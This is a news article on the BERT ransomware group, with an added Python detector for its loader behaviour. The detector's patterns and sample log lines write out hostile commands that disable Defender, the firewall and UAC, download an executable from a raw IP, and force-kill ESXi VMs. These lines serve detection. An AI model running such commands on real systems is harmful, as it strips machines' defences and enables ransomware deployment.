
New ransomware gang found terrorising Windows and Linux PCs

by Yadullah Abidi

Illustration: JMiks | Shutterstock

Security researchers have discovered a novel ransomware group called BERT targeting organisations across Asia, Europe, and the US. The group targets both Windows and Linux machines and already has confirmed victims across industry sectors, including healthcare, tech, and event services companies.

BERT was first observed by Trend Micro researchers in April 2025 targeting organisations across the US and parts of Asia. Since then, the group has expanded its activity to Europe and more countries within Asia. Trend Micro’s report notes that multiple distinct samples were found during the investigation, suggesting the operators are still actively iterating on and improving their ransomware.


Not much is known about the group at the time of writing. Analysis of a sample caught in the wild revealed that the ransomware is fetched and executed from a remote IP address associated with ASN 39134, which is registered in Russia. On its own, this is not enough to attribute the group: Russian-registered infrastructure only indicates some connection to threat actors located in, or operating through, the region, and can just as easily be rented by actors elsewhere.

BERT uses a simple codebase, with tactics including PowerShell-based loaders, privilege escalation, and concurrent (multi-threaded) file encryption. On Windows, a loader elevates privileges, then disables Windows Defender, the Windows Firewall, and User Account Control (UAC), before downloading and executing the ransomware payload from the aforementioned remote IP address. The Linux variant works differently but keeps the same simple approach: it uses up to 50 threads to speed up encryption and, on ESXi hosts, can forcibly shut down running virtual machines so that they cannot be recovered or snapshotted while encryption proceeds.
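The loader sequence described above (strip Defender, firewall and UAC, then pull a payload from a raw IP) is easier to catch as a combination than as any single command, since each of those commands is also something an administrator might legitimately run. The following detector is an added example, not code from the article or from Trend Micro's report, and nothing in it is taken from the BERT sample: the log format (`<ts> host=<name> event=<id> cmd=<command line>`), the sample log lines, the host names and the 203.0.113.10 address are all constructed for illustration, and the indicator patterns are generic Windows and ESXi admin commands chosen as stand-ins for the behaviours the report describes. It groups matches per host and only escalates to "critical" when defence tampering and a download from a bare IP appear together, which is the shape of the Windows loader; the ESXi VM-kill pattern covers the Linux variant's anti-recovery step.

```python
import re
from dataclasses import dataclass, field

# Behaviour patterns for the loader sequence described in the article. These are
# generic Windows/ESXi admin commands chosen for illustration (assumption), not
# strings extracted from the BERT sample.
INDICATORS = {
    "defender_disabled": re.compile(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I),
    "firewall_disabled": re.compile(
        r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off"
        r"|Set-NetFirewallProfile\b.*-Enabled\s+False", re.I),
    "uac_disabled": re.compile(r"EnableLUA\b.*(?:/d\s+0\b|-Value\s+0\b)", re.I),
    "remote_download": re.compile(
        r"(?:Invoke-WebRequest|DownloadFile|DownloadString|curl)\b.*"
        r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),   # payload pulled from a bare IP
    "esxi_vm_kill": re.compile(r"esxcli\s+vm\s+process\s+kill\b", re.I),
}
TAMPERING = {"defender_disabled", "firewall_disabled", "uac_disabled"}

# Constructed log format (assumption): "<ts> host=<name> event=<id> cmd=<command line>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+event=(?P<event>\S+)\s+cmd=(?P<cmd>.*)$")

# Constructed sample log: one tampered workstation, one admin doing routine work,
# one ESXi host, one build box fetching from a hostname rather than an IP.
SAMPLE_LOG = r"""
2025-04-12T03:14:05Z host=WS-07 event=4104 cmd=Set-MpPreference -DisableRealtimeMonitoring $true
2025-04-12T03:14:06Z host=WS-07 event=4104 cmd=netsh advfirewall set allprofiles state off
2025-04-12T03:14:07Z host=WS-07 event=4104 cmd=reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2025-04-12T03:14:09Z host=WS-07 event=4104 cmd=Invoke-WebRequest -Uri http://203.0.113.10/x.exe -OutFile C:\Users\Public\x.exe
2025-04-12T09:02:11Z host=WS-02 event=4104 cmd=Get-MpComputerStatus
2025-04-12T09:02:30Z host=WS-02 event=4104 cmd=Set-NetFirewallProfile -Profile Domain -Enabled True
2025-04-12T03:20:44Z host=esxi-01 event=shell cmd=esxcli vm process kill --type=force --world-id=12345
2025-04-12T10:00:00Z host=build-03 event=shell cmd=curl -sSL https://packages.example.org/tool.tar.gz -o tool.tar.gz
"""


@dataclass
class HostFindings:
    hits: dict = field(default_factory=dict)  # indicator name -> list of matching commands


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def scan(lines):
    """Collect indicator matches per host so the sequence can be judged as a whole."""
    findings = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        host = findings.setdefault(rec["host"], HostFindings())
        for name, pat in INDICATORS.items():
            if pat.search(rec["cmd"]):
                host.hits.setdefault(name, []).append(rec["cmd"])
    return findings


def verdict(f):
    """Severity from the combination of behaviours on a host, not from any single command."""
    seen = set(f.hits)
    if len(seen & TAMPERING) >= 2 and "remote_download" in seen:
        return "critical"  # defences stripped and a payload pulled from a raw IP
    if seen & TAMPERING or "esxi_vm_kill" in seen:
        return "high"
    if seen:
        return "medium"
    return "none"


if __name__ == "__main__":
    for host, f in scan(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: {verdict(f)} {sorted(f.hits)}")
```

Run stand-alone, it reports WS-07 as critical, esxi-01 as high and the two benign hosts as none. In a real deployment the log source would be PowerShell Script Block Logging (event 4104) and ESXi shell logs; the point of the per-host grouping is that `Set-MpPreference` or a firewall change alone should raise a ticket, not a page.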

The BERT ransomware ransom note. | Source: Trend Micro

The ransom note is equally plain. There are no ominous warnings, just a statement that the victim's network has been hacked, that files have been encrypted, and that some "important files" have been exfiltrated, which signals the double-extortion model now standard among ransomware groups. The note then provides an ID for contacting the BERT team over an encrypted messenger, where any negotiation takes place.


Yadullah Abidi


Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.
